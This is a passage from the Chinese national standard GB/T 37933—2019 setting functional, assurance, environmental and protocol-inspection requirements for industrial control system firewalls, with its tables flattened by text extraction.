开发者应提供产品及其准备程序,技术要求如下: a) 描述与开发者交付程序相一致的安全接收所交付产品必需的所有步骤; b) 描述安全安装产品及其运行环境必需的所有步骤。 6.1.4.3 生命周期支持 6.1.4.3.1 配置管理能力 开发者的配置管理能力应满足以下要求: a) 为产品的不同版本提供唯一的标识; b) 使用配置管理系统对组成产品的所有配置项进行维护,并唯一标识各配置项; c) 提供配置管理文档,配置管理文档描述用于唯一标识配置项的方法。 6.1.4.3.2 配置管理范围 开发者应提供产品配置项列表,并说明配置项的开发者。配置项列表至少包括产品、安全保障要求 的评估证据和产品的组成部分。 6.1.4.3.3 交付程序 开发者应使用一定的交付程序交付产品,并将交付过程文档化。在给用户方交付产品的各版本时, 交付文档应描述为维护安全所必需的所有程序。 6.1.4.3.4 支撑系统安全保障 开发者应明确产品支撑系统的安全保障措施,技术要求如下: a) 若产品以软件形态提交,应在交付文档中详细描述支撑操作系统的兼容性、可靠性、安全性 要求; b) 若产品以硬件形态提交,应选取和采用安全可靠的支撑操作系统,以最小化原则选取必要的系 统组件,并采取一定的加固措施。 6.1.4.3.5 硬件安全保障 若产品以硬件形态提交,开发者应采取措施保障硬件安全,技术要求如下: a) 产品应采用具有高可靠性、满足性能指标要求的硬件平台; b) 若硬件平台为外购,应制定相应程序对硬件提供商进行管理、对采购的硬件平台或部件进行验 证测试。并要求硬件提供商提供合格证明及必要的第三方环境适用性测试报告。 6.1.4.4 测试 6.1.4.4.1 测试覆盖 开发者应提供测试覆盖文档,测试覆盖描述应表明测试文档中所标识的测试与功能规范中所描述 的产品的安全功能间的对应性。 6.1.4.4.2 功能测试 开发者应测试产品安全功能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的测试,并描述执行每个测试的方案,这些方案包括对于其他测试结果 的任何顺序依赖性; b) 预期的测试结果,表明测试成功后的预期输出; c) 实际测试结果和预期的测试结果一致。 6.1.4.4.3 性能测试 开发者应测试产品性能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的性能测试指标,并描述执行每个测试的方案,这些方案包括产品的安 全参数及安全策略条件,测试工具仪表及其配置参数等; b) 测试结果,记录各条件下测试的性能指标值。 6.1.4.4.4 独立测试 开发者应提供一组与其自测安全功能时使用的同等资源,以用于安全功能的抽样测试。 6.1.4.5 脆弱性评定 基于已标识的潜在脆弱性,产品能够抵抗基本的攻击。 6.2 增强级安全技术要求 6.2.1 安全功能要求 6.2.1.1 网络层控制 6.2.1.1.1 包过滤 工控防火墙的包过滤要求如下: a) 安全策略应使用默认禁止原则,即除非明确允许,否则就禁止; b) 安全策略应包含基于源 IP 地址、目的IP 地址的访问控制; c) 安全策略应包含基于源端口、目的端口的访问控制; d) 安全策略应包含基于协议类型的访问控制; e) 安全策略可包含基于 MAC 地址的访问控制; f) 安全策略可包含基于时间的访问控制; g) 应支持用户自定义的安全策略,安全策略可以是MAC 地址、IP 地址、端口、协议类型和时间的 部分或全部组合。 6.2.1.1.2 NAT 部署域间的工控防火墙应具备 NAT 功能,具体技术要求如下: a) 应支持双向NAT:SNAT 和 DNAT; b) SNAT 应至少可实现“多对一”地址转换,使得内部网络主机访问外部网络时,其源 IP 地址被 转换; c) DNAT 应至少可实现“一对多”地址转换,将 DMZ 的 IP 地址/端口映射为外部网络合法 IP 地 址/端口,使外部网络主机通过访问映射地址和端口实现对 DMZ 服务器的访问。 6.2.1.1.3 状态检测 工控防火墙应具备状态检测功能,支持基于状态检测技术的访问控制。 6.2.1.1.4 动态开放端口 工控防火墙应具备动态开放端口功能,应至少支持 OPC 、FTP 协议。 6.2.1.1.5 IP/MAC 地址绑定 工控防火墙应支持自动或手动绑定 IP/MAC 地址;应能够检测 IP 地址盗用事件,拦截盗用IP 地 址的主机经过工控防火墙的各种访问。 6.2.1.1.6 流量监测 部署域间的工控防火墙应具备流量统计功能: a) 能够通过 IP 地址、网络服务、时间和协议类型等参数或它们的组合对流量进行正确的统计; b) 能够实时或者以报表形式输出流量统计结果; c) 能够对流量超过预警值的行为进行告警。 6.2.1.1.7 带宽管理 部署域间的工控防火墙应具备带宽保障功能,使得在带宽出现拥堵时,能够保障重要终端的网络 通信。 6.2.1.1.8 抗拒绝服务攻击 工控防火墙具有抗拒绝服务攻击的能力,具体技术要求如下(包括,但不限于): a) ICMP Flood 攻击; b) UDP Flood 攻击; c) SYN Flood 攻击; d) TearDrop 攻击; e) Land 攻击; f) 超大ICMP 数据攻击。 6.2.1.1.9 网络扫描防护 工控防火墙应能够检测和记录扫描行为,包括对工控防火墙自身和受保护网络的扫描。 6.2.1.2 应用层控制 6.2.1.2.1 应用协议控制 工控防火墙应能识别并控制各种应用类型,具体技术要求如下: a) 支持 HTTP 、FTP 、Telnet 等通用应用层协议; b) 支持常用工业控制协议,如 OPC 、Modbus TCP 、Profinet 、BACnet 、DNP3 、IEC104 等 ; c) 自定义应用类型。 6.2.1.2.2 工业协议深度内容检测 工控防火墙应能对主流工业协议进行深度内容检测,具体技术要求如下: a) 工控协议格式规约检查,禁止不符合协议规约的通信; b) 对工业协议的操作类型、操作对象、操作范围等参数进行控制; c) 至少支持三种主流工控协议。 注:具体工控协议检测深度参见附录C。 6.2.2 自身安全要求 6.2.2.1 运维管理 6.2.2.1.1 管理安全 工控防火墙应具备相应措施保证管理安全,具体技术要求如下: a) 支持对授权管理员的口令鉴别方式,且口令设置满足安全要求; b) 应在所有授权管理员请求执行任何操作之前,对每个授权管理员进行唯一的身份鉴别; c) 应对授权管理员选择两种或两种以上组合的鉴别技术进行身份鉴别; d) 应具有登录失败处理功能,身份鉴别在经过一个可设定的鉴别失败最大次数后,工控防火墙应 终止管理主机或用户建立的会话; e) 工控防火墙应为每一个规定的授权管理员提供一套唯一的为执行安全策略所必需的安全 属性。 6.2.2.1.2 管理方式 工控防火墙应具备多种管理方式,具体技术要求如下: a) 应支持进行本地管理工控防火墙; b) 应支持通过安全管理平台方式对工控防火墙进行集中管理; c) 应支持通过网络接口进行远程管理,并可限定可进行远程管理的网络接口; d) 应支持对可远程管理的主机地址(IP 或 MAC) 进行限制; e) 应支持通过标准协议(如 SNMP) 对工控防火墙的状态进行监测,如 CPU、内存使用率,接口状 态等; f) 远程管理过程中,管理主机与工控防火墙之间的所有通信数据应加密传输。 6.2.2.1.3 管理能力 工控防火墙应具备相应的管理能力,具体技术要求如下: a) 向授权管理员提供设置和修改安全管理相关的数据参数的功能; b) 向授权管理员提供设置、查询和修改各种安全策略的功能; c) 向授权管理员提供管理审计日志的功能; d) 工控防火墙应支持将管理用户权限进行分离。 6.2.2.2 安全审计 6.2.2.2.1 记录事件类型 工控防火墙应具备安全审计功能,记录事件类型要求如下: a) 工控防火墙访问控制策略匹配的访问请求; b) 访问控制策略默认禁止的访问请求,包括试图穿越或到达工控防火墙的访问请求; c) 检测到的攻击行为; d) 试图登录工控防火墙管理端口和管理身份鉴别请求; e) 对工控防火墙系统重要管理配置操作,如增加/删除/修改管理员、保存/删除审计日志、更改安 全策略和配置参数等; f) 其他应记录的事件类型。 6.2.2.2.2 日志内容 工控防火墙应具备安全审计功能,日志内容要求如下: a) 事件发生的日期时间,日期应包括年、月、日,时间应包括时、分、秒; b) 访问控制日志应包括数据包的协议类型、源地址、目标地址、源端口、目标端口,允许或禁止; c) 工控协议的深度内容检查信息; d) 管理日志应包括事件主体、事件客体、事件描述; e) 应根据日志内容设置日志级别,包括但不限于调试、信息、警告、错误等多个级别。 6.2.2.2.3 日志管理 工控防火墙应支持日志管理功能,具体技术要求如下: a) 应只允许授权审计员对日志进行读取、存档、导出、删除和清空等操作; b) 应提供日志查阅工具,具备对审计事件以时间、日期、主体标识、客体标识等条件检索的能力, 并且只允许授权管理员使用查阅工具; c) 审计事件应存储于掉电非易失性存储介质中,且在存储空间达到阈值时通知授权管理员进行 处理; d) 应支持第三方日志管理系统对工控防火墙日志信息进行集中收集、存储。 6.2.2.3 安全管理 6.2.2.3.1 安全支撑系统 工控防火墙的底层支撑系统应满足以下要求: a) 不提供多余的网络服务; b) 不含任何导致产品权限丢失、拒绝服务等中高风险的安全漏洞。 6.2.2.3.2 异常处理机制 工控防火墙在非正常关机(比如掉电、强行关机)再重新启动后,应满足如下技术要求: a) 安全策略恢复到关机前的状态; b) 日志信息不会丢失; c) 管理员重新鉴别。 6.2.2.4 高可用性 6.2.2.4.1 可用性保障 部署在现场控制层的工控防火墙应具备 Bypass 功能,当工控防火墙自身出现断电或其他软硬件故 障时,应使工控防火墙内部接口与外部接口直接物理连通,保持内部网络与外部网络之间的正常通信, 并及时告警。 6.2.2.4.2 设备自检 工控防火墙应具备一定的自检功能: a) 在初始化或启动期间,应能对设备硬件、程序或功能模块、重要配置文件等进行检测,当发现异 常时能够及时告警,并对程序文件或者配置文件的异常提供一定的恢复功能; b) 在运行期间,应能在授权管理员的要求下或者周期性的对提供安全功能的模块或进程进行检 测,当出现异常时能够及时告警,并自动恢复功能模块或者进程的运行。 6.2.2.4.3 运行模式 工控防火墙应支持多种运行模式,工控防火墙能够区分部署过程和工作过程,以实现对被防护系统 的最小影响,具体技术要求如下: a) 支持学习模式,工控防火墙记录运行过程中经过防火墙的所有策略、资产等信息,形成白名单 策略集; b ) 应支持工控协议的深度内容检测策略学习,学习深度与工业协议深度内容检测深度一致; c) 支持验证模式或测试模式,该模式下工控防火墙对禁止策略进行告警,但不拦截; d) 支持正常工作模式,工控防火墙的正常工作模式,严格按照防护策略进行过滤等动作保护。 6.2.2.4.4 安全策略更新 工控防火墙安全策略应用时不应影响正常的数据通信。 6.2.2.4.5 时间同步 工控防火墙应支持与时钟服务器自动同步时间功能。 6.2.2.4.6 电源冗余 部署现场控制层的工控防火墙应提供双电源冗余功能。 6.2.2.4.7 散热方式 部署现场控制层的工控防火墙应采用自然散热,无风扇方式设计。 6.2.2.4.8 双机热备 部署域间的工控防火墙应具备双机热备的能力,当主防火墙自身出现断电或其他软硬件故障时,备 防火墙应及时发现并接管主防火墙进行工作。 6.2.3 性能要求 见6.1.3。 6.2.4 安全保障要求 6.2.4.1 开发 6.2.4.1.1 安全架构 开发者应提供产品安全功能的安全架构描述,技术要求如下: a) 与产品设计文档中对安全功能的描述一致; b) 描述与安全功能要求一致的安全域; c) 描述产品安全功能初始化过程及安全措施; d) 证实产品安全功能能够防止被破坏; e) 证实产品安全功能能够防止安全策略被旁路。 6.2.4.1.2 功能规范 开发者应提供完备的功能规范说明,技术要求如下: a) 完整描述产品的安全功能; b) 描述所有安全功能接口的目的与使用方法; c) 标识和描述每个安全功能接口相关的所有参数; d) 描述安全功能接口相关的安全功能实施行为; e) 描述由安全功能实施行为而引起的直接错误消息; f) 证实安全功能要求到安全功能接口的追溯; g) 描述安全功能实施过程中,与安全功能接口相关的所有行为; h) 描述可能由安全功能接口的调用而引起的所有错误消息。 6.2.4.1.3 实现表示 开发者应提供全部安全功能的实现表示,技术要求如下: a) 提供产品设计描述与实现表示实例之间的映射,并证明其一致性; b) 详细定义产品安全功能,达到无须进一步设计就能生成安全功能的程度; c) 实现表示以开发人员使用的形式提供。 6.2.4.1.4 产品设计 开发者应提供产品设计文档,技术要求如下: a) 根据子系统描述产品结构,并标识和描述产品安全功能的所有子系统; b) 描述安全功能所有子系统间的相互作用; c) 提供的映射关系能够证实设计中描述的所有行为能够映射到调用它的安全功能接口; d) 根据模块描述安全功能,并提供安全功能子系统到模块间的映射关系; e) 描述所有安全功能实现模块,包括其目的及与其他模块间的相互关系; f) 描述所有模块的安全功能要求相关接口与其他相邻接口的调用参数及返回值; g) 描述所有安全功能的支撑或相关模块,包括其目的及与其他模块间的相互作用。 6.2.4.2 指导性文档 6.2.4.2.1 操作用户指南 开发者应提供明确和合理的操作用户指南,操作用户指南与为评估而提供的其他所有文档保持一 致,对每一种用户角色的描述要求如下: a) 描述授权用户可访问的功能和特权,包含适当的警示信息; b) 描述如何以安全的方式使用产品提供的接口; c) 描述可用功能和接口,尤其是受用户控制的所有安全参数,适当时指明安全值; d) 明确说明与需要执行的用户可访问功能有关的每一种安全相关事件,包括改变安全功能所控 制实体的安全特性; e) 标识产品运行的所有可能状态(包括操作导致的失败或者操作性错误),以及它们与维持安全 运行之间的因果关系和联系; f) 实现安全目的所应执行的安全策略。 6.2.4.2.2 准备程序 开发者应提供产品及其准备程序,技术要求如下: a) 描述与开发者交付程序相一致的安全接收所交付产品必需的所有步骤; b) 描述安全安装产品及其运行环境必需的所有步骤。 6.2.4.3 生命周期支持 6.2.4.3.1 配置管理能力 开发者的配置管理能力应满足以下要求: a) 为产品的不同版本提供唯一的标识; b) 使用配置管理系统对组成产品的所有配置项进行维护,并唯一标识各配置项; c) 提供配置管理文档,配置管理文档描述用于唯一标识配置项的方法; d) 配置管理系统提供一种自动方式来支持产品的生成,并确保只能对配置项进行已授权的变更; e) 配置管理文档包括配置管理计划,计划中需描述如何使用配置管理系统,并依据该计划实施配 置管理; f) 配置管理计划描述配置项的变更(包括新建、修改、删除)控制程序 。 6.2.4.3.2 配置管理范围 开发者应提供产品配置项列表,并说明配置项的开发者,技术要求如下: a) 产品、安全保障要求的评估证据和产品的组成部分; b) 实现表示、安全缺陷报告及其解决状态。 6.2.4.3.3 交付程序 开发者应使用一定的交付程序交付产品,并将交付过程文档化。在给用户方交付产品的各版本时, 交付文档应描述为维护安全所必需的所有程序。 6.2.4.3.4 开发安全 开发者应提供开发安全文档。开发安全文档应描述在产品的开发环境中,为保护产品设计和实现 的保密性和完整性所必需的所有物理的、程序的、人员的和其他方面的安全措施。 6.2.4.3.5 生命周期定义 开发者应建立一个生命周期模型对产品的开发和维护进行的必要控制,并提供生命周期定义文档 描述用于开发和维护产品的模型。 6.2.4.3.6 工具和技术 开发者应明确定义用于开发产品的工具,并提供开发工具文档无歧义的定义实现中所有语句的含 义和所有依赖选项的含义。 6.2.4.3.7 支撑系统安全保障 开发者应明确产品支撑系统的安全保障措施,技术要求如下: a) 若产品以软件形态提交,应在交付文档中详细描述支撑操作系统的兼容性、可靠性、安全性 要求; b) 若产品以硬件形态提交,应选取和采用安全可靠的支撑操作系统,以最小化原则选取必要的系 统组件,并采取一定的加固措施。 6.2.4.3.8 硬件安全保障 若产品以硬件形态提交,开发者应采取措施保障硬件安全,技术要求如下: a) 产品应采用具有高可靠性、满足性能指标要求的硬件平台; b) 若硬件平台为外购,应制定相应程序对硬件提供商进行管理、对采购的硬件平台或部件进行验 证测试。并要求硬件提供商提供合格证明及必要的第三方环境适用性测试报告。 6.2.4.4 测试 6.2.4.4.1 测试覆盖 开发者应提供测试覆盖文档,技术要求如下: a) 证实测试文档中所标识的测试与功能规范中所描述的产品的安全功能间的对应性; b) 证实功能规范中的所有安全功能接口都进行了测试。 6.2.4.4.2 测试深度 开发者应提供测试深度的分析,技术要求如下: a) 证实测试文档中的测试与产品设计中的安全功能子系统和实现模块之间的一致性; b) 证实产品设计中的所有安全功能子系统、实现模块都已经进行过测试。 6.2.4.4.3 功能测试 开发者应测试产品安全功能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的测试,并描述执行每个测试的方案,这些方案包括对于其他测试结果 的任何顺序依赖性; b) 预期的测试结果,表明测试成功后的预期输出; c) 实际测试结果和预期的测试结果一致。 6.2.4.4.4 功能安全测试 开发者应按照 GB/T20438.3—2017 中7.9 的要求进行产品软件功能安全测试。 6.2.4.4.5 性能测试 开发者应测试产品性能,将结果文档化并提供测试文档。测试文档应包括以下内容: a) 测试计划,标识要执行的性能测试指标,并描述执行每个测试的方案,这些方案包括产品的安 全参数及安全策略条件,测试工具仪表及其配置参数等; b) 测试结果,记录各条件下测试的性能指标值。 6.2.4.4.6 独立测试 开发者应提供一组与其自测安全功能时使用的同等资源,以用于安全功能的抽样测试。 6.2.4.5 脆弱性评定 基于已标识的潜在脆弱性,产品能够抵抗较强的攻击。 工控防火墙是应用于工业控制系统的一类特殊防火墙,其既要满足通用防火墙的基本要求,还要满 足工业控制环境下的特殊要求,工控防火墙主要应用在工业控制层级间防护以及各层区域间防护。 参考 GB/T 20720 的层次结构模型划分,工业控制系统主要分为三层架构:生产管理层、过程监控 层、现场控制层。 生产管理层:将生产过程控制、生产过程管理和经营管理活动中产生的诸多信息进行转换、加工、传 递,是生产过程控制与管理信息集成的重要桥梁和纽带,完成生产计划的调度与统计、生产过程成本控 制、产品质量控制与管理、设备控制与管理、生产数据采集与处理等功能,负责生产管理和调度执行。 过程控制层:以操作监视为主要任务,兼有部分管理功能。这一级是面向操作员和控制系统工程师 的,因而这一级配备有技术手段齐备,功能强的计算机系统及各类外部装置,特别是显示器和键盘,以及 需要较大存储容量的硬盘或软盘支持,另外还需要功能强的软件支持,确保工程师和操作员对系统进行 组态、监视和操作,对生产过程实行高级控制策略、故障诊断、质量评估。 现场控制层:现场控制层的主要功能包括:采集过程数据,进行数据转换与处理;对生产过程进行监 测和控制,输出控制信号,实现反馈控制、逻辑控制、顺序控制和批量控制功能;对现场设备及 I/O 卡件 进行自诊断;与过程监控层进行数据通信。 工控防火墙常见应用如下: a) 工业控制系统网络各层级间的安全防护,如图 A.1 在生产管理层网络与过程控制层网络之间 安全防护; b) 同层级网络不同控制域间的安全防护,如图 A.2 在区域间安全防护; c) 对现场控制层设备进行安全防护,如图 A.3 对现场控制层设备安全防护。 环境适应性 B.2.1 温度 表 B.1规定了设备工作、贮存和运输温度条件。设备在规定的工作温度范围内工作时,其功能和性 能应满足本附录的规定。在规定的温度范围内贮存和运输时,不应发生裂痕、老化或其他损坏;当经受 该温度范围后再恢复到工作温度范围时,设备应能正常工作。应用于温度快速变化场合的设备、在经受 不超过5℃/min 的温度变化时应能正常工作。 表 B.1 温度条件 等级 工作温度/℃ 贮存和运输温度/℃ 低温 高温 低温 高温 I 0 60 -40 70 Ⅱ -40 70 -40 85 X“ 特定 X是一个开放等级,具体温度要求范围可根据设备实际应用环境与客户协商确定。 B.2.2 相对湿度 设备在表 B.2 规定的相对湿度环境条件下应能正常工作。 表 B.2 相对湿度条件(无凝结) 等级 低相对湿度/% 高相对湿度/% I 5 95 X° 特定 X是一个开放等级,具体相对湿度要求范围可根据设备实际应用环境与客户协商确定。 B.2.3 大气压力 设备工作大气压力条件见表 B.3。 GB/T 37933—2019 表 B.3 大气压力条件 等级 低气压/kPa 高气压/kPa I 80 106 Ⅱ 70 106 X“ 特定 ”X是一个开放等级,具体大气压力要求范围可根据设备实际应用环境与客户协商确定。 B.2.4 防腐蚀 设备工作在盐雾环境条件下或存在其他化学活性物质,应提供工业环境中抗腐蚀和侵蚀的能力,保 证设备在表 B.4、表 B.5 规定的环境条件下能够长期使用。 表 B.4 盐雾 等级 最大盐雾浓度/(mg/m³) I ≤5 X⁴ 特定 ’X是一个开放等级,具体抗盐雾要求范围可根据设备实际应用环境与客户协商确定。 表 B.5 化学活性物质条件 等级 依据标准 化学活性物质 I GB/T 17214.4—2005 工业清洁空气 Ⅱ 中等污染 Ⅲ 严重污染 X 特定 “X是一个开放等级,具体抗腐蚀性要求范围可根据设备实际应用环境与客户协商确定。 B.2.5 抗霉变 设备工作在潮湿多雨地区和霉菌滋生环境下不应发生霉变,并能够正常工作。 B.3 电磁兼容性 设备应满足工业环境中的电磁兼容性要求,具体技术指标见表 B.7~表 B.26。 其中,电磁兼容辐射和传导发射限值按 GB4824—2013 为 A 类,电磁兼容抗扰度的性能判据要求 见表 B.6。 GB/T 37933—2019 表 B.6 性能判据 性能评价判据 说明 A 试验期间和试验后受试设备均应按预期要求继续运行,无功能丧失或性能下降 B 试验期间,受试设备允许出现暂时的性能下降或功能丧失,但设备可以自我恢复,试验后设备应按 预期要求继续运行。不能出现系统死机、复位或重启 C 试验期间,允许受试设备出现暂时的性能下降或功能丧失,但需要人工干预或系统复位才能恢复 表 B.7 辐射发射及传导发射要求 测试项 测试端口 依据标准 测试频段 限值 辐射发射 整机 GB 4824—2013, GB/T 9254—2008 30 MHz~1 GHz A类 传导发射 电源口、信号口 150 kHz~30 MHz A类 表 B.8 外壳端口静电放电抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.2—2018 3(接触放电士6 kV,空气放电±8 kV) A Ⅱ 4(接触放电士8 kV,空气放电±15 kV) A X° 特定 ”X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.9 整机射频电磁场辐射抗扰度要求 等级 依据标准 严酷等级 试验频段 判据 I GB/T 17626.3—2016 2(3 V/m,80%AM) 80 MHz~1 GHz A Ⅱ 3(10 V/m,80%AM) A X“ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.10 电源端口及信号端口电快瞬变脉冲群抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.4—2018 3(电源口士2 kV,信号口士1 kV) A Ⅱ 4(电源口±4kV,信号口±2 kV) A X⁴ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 GB/T 37933—2019 表 B.11 信号端口浪涌(冲击)抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.5—2008 线-地 2 A Ⅱ 3 A Ⅲ 4 A X“ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.12 直流电源输入端口浪涌(冲击)抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.5—2008 线-地 3 线-线 3 A Ⅱ 4 4 A X° 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.13 交流电源输入端口浪涌(冲击)抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.5—2008 线-地 3 线-线 3 A Ⅱ 4 4 A X“ 特定 ”X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.14 电源端口及信号端口射频场感应的传导骚扰抗扰度要求 等级 依据标准 严酷等级 试验频段 判据 I GB/T 17626.6—2017 2(3 V,80%AM) 150 kHz~80 MHz A Ⅱ 3(10 V,80%AM) A X⁴ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.15 整机工频磁场抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.8—2006 稳定持续磁场:4级;短时作用磁场:4级 A Ⅱ 稳定持续磁场:5级;短时作用磁场:5级 A X 特定 ’X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 GB/T 37933—2019 表 B.16 整机阻尼振荡磁场抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.10—2017 4 A Ⅱ 5 A X 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.17 电源端口阻尼振荡波抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.18—2016 2 A Ⅱ 3 A X“ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.18 振铃波抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T17626.12—2013中的表1 3 A Ⅱ 4 A X“ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.19 电源口0 Hz~150 Hz共模传导骚扰抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.16—2007 3 A Ⅱ 4 A X⁴ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.20 交流电源输入端口电压暂降抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.11—2008 2 类 B Ⅱ 3 类 B X 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 GB/T 37933—2019 表 B.21 交流电源输入端口短时中断抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.11—2008 2 类 C Ⅱ 3 类 C X° 特定 ‘X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.22 交流电源输入端口电压变化抗扰度要求 等级 依据标准 试验参数 电压实验等级 电压降低所需时间 降低后电压维持时间 电压增加所需时间 判据 I GB/T 17626.11—2008 70% 突变 1周期 25周期 A X 特定 特定 特定 特定 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.23 直流电源输入端口纹波抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.17—2005 2 A Ⅱ 3 A Ⅲ 4 A X⁴ 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.24 直流电源输入端口电压暂降抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.29—2006 试验等级:40%Ur和70%Ur;持续时间:1 s A X⁴ 特定 ‘X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.25 直流电源输入端口短时中断抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.29—2006 试验等级:0%Ur;持续时间:1 s B X“ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 GB/T 37933—2019 表 B.26 直流电源输入端口电压变化抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.29—2006 试验等级:80%Uπ和120%Ur;持续时间:10s A X“ 特定 ‘X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 B.4 绝缘性能 B.4.1 绝缘电阻 设备的绝缘电阻要求见表 B.27。 表 B.27 绝缘电阻要求 名称 依据标准 一般环境绝缘电阻 GB/T 13729—2002中的表13 湿热环境绝缘电阻 GB/T 13729—2002中的表14 B.4.2 绝缘耐压 设备的绝缘耐压要求见表 B.28。 表 B.28 绝缘耐压要求 名称 依据标准 严酷等级 额定绝缘电压小于或等于60 V的回路 GB/T 15153.1—1998 VW2 额定绝缘电压大于或等于60 V的回路 VW3 注:高海拔地区空气密度小,同等电压下,空气更容易产生电离现象,使设备的绝缘性能下降。在高海拔地区使 用的设备可通过合理设计,保证其绝缘性能。 B.4.3 泄漏电流 设备工作时对保护接地端的泄漏电流应不大于5 mA。 B.5 接地 设备应具有接地端子及标记,标记应具耐久性且易识别,接地直流电阻不大于10 mΩ。 B.6 机械适应性 设备应提供工业环境中的机械适应性能力,具体技术要求见表 B.29。 表 B.29 机械适应性要求 名称 依据标准 等级 备注 正弦振动-工作 GB/T 2423.10—2008 5 Hz≤f≤9 Hz,7 mm;9 Hz≤f≤150 Hz, 2.0 g;每分钟一倍频程(±10%) 在三个互相垂直轴的每个 轴上分别扫描10次 冲击-工作 GB/T 2423.5—1995 15g,持续时间:11 ms/次,脉冲波形:半正弦 每个坐标轴的+/一方向各 进行3次冲击,即共18次 垂直冲击-包装运输 GB/T 2423.8—1995 未包装产品质量≤10 kg,跌落高度0.25 m 未包装产品质量≤50 kg,跌落高度0.10 m 面棱角的顺序,每个包装 实验3次 在完整包装箱中质量≤50 kg,跌落高度0.5 m 在完整包装箱中质量≤100 kg,跌落高度0.25 m B.7 外壳防护 设备的外壳防护等级由制造商和用户协商确定,防护等级应从表 B.30 规定的范围内选择。 表 B.30 外壳防护等级表 防尘等级 防水等级 依据标准 IP2X IP3X IP4X IP5X IPX0 IPX1 IPX2 IPX3 IPX4 IPX5 IPX6 IPX7 GB/T 4208—2017 工控协议名称 控制深度要求 备注 Modbus TCP协议 按寄存器起始地址读写控制 按寄存器长度读写控制 与“按寄存器结束地址读写控制”相结合,二选一 按寄存器结束地址读写控制 与“按寄存器长度读写控制”相结合,二选一 寄存器值的读写控制 值的大小范围 功能码检查 O P C 协 议 支持动态开放端口 支持TAG控制点的全局读写控制 支持TAG控制点名称的读写控制 支持TAG控制点数据类型的控制 支持TAG控制点值的读写控制 值的大小范围 支持文件导入TAG控制点 S7协议 功能码检查 一 — 按数据空间类型读写控制 —— 按数据地址长度读写控制 与“按数据结束地址读写控制”相结合,二选一 按数据结束地址读写控制 与“按数据长度读写控制”相结合,二选一 数据值的读写控制 值的大小范围 Ethernet/IP 支持ITEM控制点名称的读写控制 支持ITEM控制点值的读写控制 值的大小范围 FINS 命令类型检查 按数据空间类型读写控制 FINS 按源、目的网络地址,源、目的节点地址, 源、目的单元地址控制 按数据地址长度读写控制 与“按数据结束地址读写控制”相结合,二选一 按数据结束地址读写控制 与“按数据长度读写控制”相结合,二选一 IEC104协议 支持S帧、I帧、U帧格式检查 支持遥控、遥调、总召、突变上传等操作 码控制 支持功能码检查、点号地址控制、值范围 控制 I 帧 有则适用 支持信息体地址范围检查、信息体元素值 检查、公共地址范围检查、传送原因检查 I帧 有则适用 工控协议名称 控制深度要求 备注 IEC61850/GOOSE 支持畸形数据包检查 按点位值的范围控制 —— 支持按照数据集进行点位值检查 IEC61850/SV 支持畸形数据包检查 支持多ASDU检查 支持svID,数据集,版本号的检查 IEC61850/MMS 支持mmsPDU类型控制 支持mms服务类型控制 与mms服务类型有关 支持按逻辑节点名控制 支持对应逻辑节点的数据类型、值检测 —— DNP3协议 支持主站、从站地址控制 支持链路层、应用层功能码检查 支持对象组和变体的控制 变体对象与应用层功能码有关 支持对应变体对象的限定词、变体值控制 支持是否允许广播控制 变体对象与应用层功能码有关 FF协议 支持FF消息类型控制 支持参数下标、参数次标、设备号位控制 下标、次标、设备号位与FF消息类型有关 支持对应下标、参数次标的数据类型及 数据控制
standards
